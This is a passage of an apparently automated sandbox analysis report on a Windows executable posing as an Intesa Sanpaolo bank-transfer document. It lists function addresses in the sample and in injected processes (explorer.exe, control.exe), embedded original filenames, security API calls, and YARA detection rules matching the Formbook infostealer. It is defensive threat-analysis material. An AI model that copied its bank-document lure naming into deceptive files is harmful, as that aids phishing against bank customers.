          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113D8006_2_0113D800
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D38E06_2_010D38E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FB766_2_0118FB76
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01099B806_2_01099B80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EFB806_2_010EFB80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01145BF06_2_01145BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110DBF96_2_0110DBF9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FA496_2_0118FA49
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01187A466_2_01187A46
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01143A6C6_2_01143A6C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01115AA06_2_01115AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116DAAC6_2_0116DAAC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117DAC66_2_0117DAC6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01181D5A6_2_01181D5A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D3D406_2_010D3D40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01187D736_2_01187D73
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EFDC06_2_010EFDC0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01149C326_2_01149C32
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FCF26_2_0118FCF2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FF096_2_0118FF09
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D1F926_2_010D1F92
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FFB16_2_0118FFB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01093FD26_2_01093FD2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01093FD56_2_01093FD5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D9EB06_2_010D9EB0
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B80367_2_0C3B8036
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3AF0827_2_0C3AF082
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B69127_2_0C3B6912
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B0D027_2_0C3B0D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3BC5CD7_2_0C3BC5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B92327_2_0C3B9232
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B3B327_2_0C3B3B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B3B307_2_0C3B3B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6112327_2_0C611232
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6100367_2_0C610036
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6070827_2_0C607082
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60BB307_2_0C60BB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60BB327_2_0C60BB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0C608D027_2_0C608D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60E9127_2_0C60E912
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6145CD7_2_0C6145CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022764B8_2_0022764B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022305C8_2_0022305C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022978B8_2_0022978B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483E4F68_2_0483E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048424468_2_04842446
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048505918_2_04850591
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047905358_2_04790535
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AC6E08_2_047AC6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047907708_2_04790770
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047B47508_2_047B4750
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478C7C08_2_0478C7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048501AA8_2_048501AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048481CC8_2_048481CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047801008_2_04780100
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482A1188_2_0482A118
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048181588_2_04818158
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048102C08_2_048102C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048302748_2_04830274
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048503E68_2_048503E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479E3F08_2_0479E3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484A3528_2_0484A352
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04830CB58_2_04830CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04790C008_2_04790C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04780CF28_2_04780CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479AD008_2_0479AD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478ADE08_2_0478ADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A8DBF8_2_047A8DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484CE938_2_0484CE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04790E598_2_04790E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484EEDB8_2_0484EEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484EE268_2_0484EE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A2E908_2_047A2E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0480EFA08_2_0480EFA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047B0F308_2_047B0F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D2F288_2_047D2F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479CFE08_2_0479CFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04782FC88_2_04782FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04804F408_2_04804F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479A8408_2_0479A840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047928408_2_04792840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047BE8F08_2_047BE8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047768B88_2_047768B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A69628_2_047A6962
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0485A9A68_2_0485A9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047929A08_2_047929A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478EA808_2_0478EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04846BD78_2_04846BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484AB408_2_0484AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047814608_2_04781460
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F43F8_2_0484F43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482D5B08_2_0482D5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048475718_2_04847571
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048416CC8_2_048416CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F7B08_2_0484F7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483F0CC8_2_0483F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F0E08_2_0484F0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048470E98_2_048470E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047970C08_2_047970C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0477F1728_2_0477F172
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C516C8_2_047C516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479B1B08_2_0479B1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0485B16B8_2_0485B16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048312ED8_2_048312ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AB2C08_2_047AB2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047952A08_2_047952A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0477D34C8_2_0477D34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484132D8_2_0484132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D739A8_2_047D739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FCF28_2_0484FCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04809C328_2_04809C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04793D408_2_04793D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AFDC08_2_047AFDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04841D5A8_2_04841D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04847D738_2_04847D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04799EB08_2_04799EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FFB18_2_0484FFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FF098_2_0484FF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04791F928_2_04791F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047FD8008_2_047FD800
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047938E08_2_047938E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047999508_2_04799950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AB9508_2_047AB950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482DAAC8_2_0482DAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483DAC68_2_0483DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04847A468_2_04847A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FA498_2_0484FA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D5AA08_2_047D5AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04803A6C8_2_04803A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04805BF08_2_04805BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047CDBF98_2_047CDBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FB768_2_0484FB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AFB808_2_047AFB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02539E608_2_02539E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532FB08_2_02532FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532D908_2_02532D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532D878_2_02532D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254EDAD8_2_0254EDAD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453A0368_2_0453A036
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04532D028_2_04532D02
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453E5CD8_2_0453E5CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_045310828_2_04531082
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_045389128_2_04538912
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453B2328_2_0453B232
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04535B328_2_04535B32
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04535B308_2_04535B30
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1366719336.0000000006C10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000000.1295039681.0000000000300000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBIze.exe< vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1367761102.0000000007650000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1360830781.00000000026C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.00000000011BD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CBD000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Binary or memory string: OriginalFilenameBIze.exe< vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, yVWN9ifYkhERJOAQN3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yVWN9ifYkhERJOAQN3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.AddAccessRule
